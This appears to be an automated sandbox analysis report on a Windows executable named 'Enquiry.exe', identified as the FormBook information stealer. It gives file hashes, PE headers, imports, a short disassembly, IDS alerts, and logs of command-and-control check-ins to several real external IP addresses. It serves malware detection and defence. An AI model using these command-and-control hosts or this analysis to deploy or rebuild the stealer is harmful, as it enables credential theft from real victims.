                          DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                          • 160.251.148.115
                          No context
                          No context
                          Process:C:\Windows\SysWOW64\RmClient.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):114688
                          Entropy (8bit):0.9746603542602881
                          Encrypted:false
                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\Enquiry.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):287232
                          Entropy (8bit):7.993823006707054
                          Encrypted:true
                          SSDEEP:6144:Kuyt//xxccSubfCRmXQnHQPxAksb0C7YUkHbpzEisyGJu:K7tLccSeCRmEwPxA1b0smHb1Ei0Ju
                          MD5:AED6F9CB31DC5F383D133EC4362218D6
                          SHA1:6641597443E0D3567C1332EC88D9819EFE77E645
                          SHA-256:41FE2414D1F7572EAD66633F0DDCB9ABD314F79421E5586A3769E3763DB118A9
                          SHA-512:7C27AE3C0F9CBEC024D254B7EC036B8C10886DF8D4DC570595AF2DE46CE5FE422B575807D23BCE6EC63189B5DC5B1416D9407FBA0C53925C05486EA647B91071
                          Malicious:false
                          Reputation:low
                          Preview:~....3CFC`.J....OU..oR;...8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC.OV3@T._3.O...W..{.2*Ao&A!,50^c%"V697m8<z1G!vZ k..`c+,\=xN@P}ZC2OV3N2FX.~&$.e6$.g9=.(...t+ .)...81.W...R(.a'(/lS$.C8XVCMZY..2O.2OK:...FC8XVCMZ.ZA3DW8NK.U3CFC8XVCMJLZC2_V3N+CQ3C.C8HVCMXYZE2OV3NKGW3CFC8XVC-^YZA2OV3NKEQs.FC(XVSMZYZS2OF3NKGQ3SFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVm9?!.C2O.|JKGA3CF.<XVSMZYZC2OV3NKGQ3cFCXXVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVCMZYZC2OV3NKGQ3CFC8XVC
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.535090922028019
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Enquiry.exe
                          File size:1'350'779 bytes
                          MD5:c317103ec0a74f2c480a9f859102b530
                          SHA1:2630d8e2081974601b5424dd1a6b596ab692fb04
                          SHA256:dc32f136f8ce43634b3ccb423347bd015ce2371cfd65af25d28b61e489aa7aa9
                          SHA512:42898fee33b1d7fc4a595c324d5b0bf13b2d8075294b65fc693b687f2fc62fe15fb56bbf46dca133ca28dc5cf2ee1998eb6367e12eb217a6a275b03816e83cc2
                          SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCJkaPstJapOWYzrdkyGgzDxNmjJ5:7JZoQrbTFZY1iaCJgeQWYyZKCjJ5
                          TLSH:1255F122F5C69036C1B323B19E7EF76A9A3C69361336D2D727C82D315EA04416B29773
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                          Icon Hash:1733312925935517
                          Entrypoint:0x4165c1
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                          Instruction
                          call 00007EFEF897FBABh
                          jmp 00007EFEF8976A1Eh
                          int3
                          int3
                          int3
                          int3
                          int3
                          push ebp
                          mov ebp, esp
                          push edi
                          push esi
                          mov esi, dword ptr [ebp+0Ch]
                          mov ecx, dword ptr [ebp+10h]
                          mov edi, dword ptr [ebp+08h]
                          mov eax, ecx
                          mov edx, ecx
                          add eax, esi
                          cmp edi, esi
                          jbe 00007EFEF8976B9Ah
                          cmp edi, eax
                          jc 00007EFEF8976D36h
                          cmp ecx, 00000080h
                          jc 00007EFEF8976BAEh
                          cmp dword ptr [004A9724h], 00000000h
                          je 00007EFEF8976BA5h
                          push edi
                          push esi
                          and edi, 0Fh
                          and esi, 0Fh
                          cmp edi, esi
                          pop esi
                          pop edi
                          jne 00007EFEF8976B97h
                          jmp 00007EFEF8976F72h
                          test edi, 00000003h
                          jne 00007EFEF8976BA6h
                          shr ecx, 02h
                          and edx, 03h
                          cmp ecx, 08h
                          jc 00007EFEF8976BBBh
                          rep movsd
                          jmp dword ptr [00416740h+edx*4]
                          mov eax, edi
                          mov edx, 00000003h
                          sub ecx, 04h
                          jc 00007EFEF8976B9Eh
                          and eax, 03h
                          add ecx, eax
                          jmp dword ptr [00416654h+eax*4]
                          jmp dword ptr [00416750h+ecx*4]
                          nop
                          jmp dword ptr [004166D4h+ecx*4]
                          nop
                          inc cx
                          add byte ptr [eax-4BFFBE9Ah], dl
                          inc cx
                          add byte ptr [ebx], ah
                          ror dword ptr [edx-75F877FAh], 1
                          inc esi
                          add dword ptr [eax+468A0147h], ecx
                          add al, cl
                          jmp 00007EFEFADEF397h
                          add esi, 03h
                          add edi, 03h
                          cmp ecx, 08h
                          jc 00007EFEF8976B5Eh
                          rep movsd
                          jmp dword ptr [00000000h+edx*4]
                          Programming Language:
                          • [ C ] VS2010 SP1 build 40219
                          • [C++] VS2010 SP1 build 40219
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2010 SP1 build 40219
                          • [RES] VS2010 SP1 build 40219
                          • [LNK] VS2010 SP1 build 40219
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                          RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                          RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                          RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                          RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                          RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                          RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                          RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                          RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                          RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                          RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                          RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                          RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                          RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                          RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                          RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                          RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                          RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                          RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                          RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                          RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                          RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                          RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                          RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                          RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                          DLLImport
                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                          Language of compilation systemCountry where language is spokenMap
                          EnglishGreat Britain
                          EnglishUnited States
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-09-23T14:54:13.280749+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973644.213.25.7080TCP
                          2024-09-23T14:54:13.280749+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973644.213.25.7080TCP
                          2024-09-23T14:54:29.679685+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449738206.119.82.13480TCP
                          2024-09-23T14:54:32.420697+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449739206.119.82.13480TCP
                          2024-09-23T14:54:34.873915+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449740206.119.82.13480TCP
                          2024-09-23T14:54:37.421281+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449741206.119.82.13480TCP
                          2024-09-23T14:54:37.421281+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449741206.119.82.13480TCP
                          2024-09-23T14:54:43.064276+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974267.223.117.18980TCP
                          2024-09-23T14:54:45.623820+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974367.223.117.18980TCP
                          2024-09-23T14:54:48.268284+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974567.223.117.18980TCP
                          2024-09-23T14:54:50.714546+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974667.223.117.18980TCP
                          2024-09-23T14:54:50.714546+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974667.223.117.18980TCP
                          2024-09-23T14:54:56.376411+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449747199.59.243.22780TCP
                          2024-09-23T14:54:58.902403+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449748199.59.243.22780TCP
                          2024-09-23T14:55:01.457388+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449749199.59.243.22780TCP
                          2024-09-23T14:55:04.005541+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449750199.59.243.22780TCP
                          2024-09-23T14:55:04.005541+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449750199.59.243.22780TCP
                          2024-09-23T14:55:10.561536+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497513.33.130.19080TCP
                          2024-09-23T14:55:12.054749+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497523.33.130.19080TCP
                          2024-09-23T14:55:14.667791+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497533.33.130.19080TCP
                          2024-09-23T14:55:17.215770+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497543.33.130.19080TCP
                          2024-09-23T14:55:17.215770+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497543.33.130.19080TCP
                          2024-09-23T14:55:24.056704+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449755183.181.83.13180TCP
                          2024-09-23T14:55:26.580468+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756183.181.83.13180TCP
                          2024-09-23T14:55:29.303524+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449757183.181.83.13180TCP
                          2024-09-23T14:55:31.624440+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449758183.181.83.13180TCP
                          2024-09-23T14:55:31.624440+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449758183.181.83.13180TCP
                          2024-09-23T14:55:37.783709+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975938.47.232.19680TCP
                          2024-09-23T14:55:40.297602+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976038.47.232.19680TCP
                          2024-09-23T14:55:42.936675+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976138.47.232.19680TCP
                          2024-09-23T14:55:45.467837+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44976238.47.232.19680TCP
                          2024-09-23T14:55:45.467837+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976238.47.232.19680TCP
                          2024-09-23T14:55:50.984622+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497633.33.130.19080TCP
                          2024-09-23T14:55:54.458853+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497643.33.130.19080TCP
                          2024-09-23T14:55:56.091683+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497653.33.130.19080TCP
                          2024-09-23T14:55:58.639205+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497663.33.130.19080TCP
                          2024-09-23T14:55:58.639205+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497663.33.130.19080TCP
                          2024-09-23T14:56:05.209183+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449767154.212.219.280TCP
                          2024-09-23T14:56:07.556609+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449768154.212.219.280TCP
                          2024-09-23T14:56:10.189077+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449769154.212.219.280TCP
                          2024-09-23T14:56:12.638591+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449770154.212.219.280TCP
                          2024-09-23T14:56:12.638591+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449770154.212.219.280TCP
                          2024-09-23T14:56:19.785777+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449771133.130.35.9080TCP
                          2024-09-23T14:56:22.341966+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449772133.130.35.9080TCP
                          2024-09-23T14:56:24.915587+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449773133.130.35.9080TCP
                          2024-09-23T14:56:27.500321+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449774133.130.35.9080TCP
                          2024-09-23T14:56:27.500321+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449774133.130.35.9080TCP
                          2024-09-23T14:56:33.252344+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497753.33.130.19080TCP
                          2024-09-23T14:56:36.212264+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497763.33.130.19080TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 23, 2024 14:54:12.121367931 CEST4973680192.168.2.444.213.25.70
                          Sep 23, 2024 14:54:12.126462936 CEST804973644.213.25.70192.168.2.4
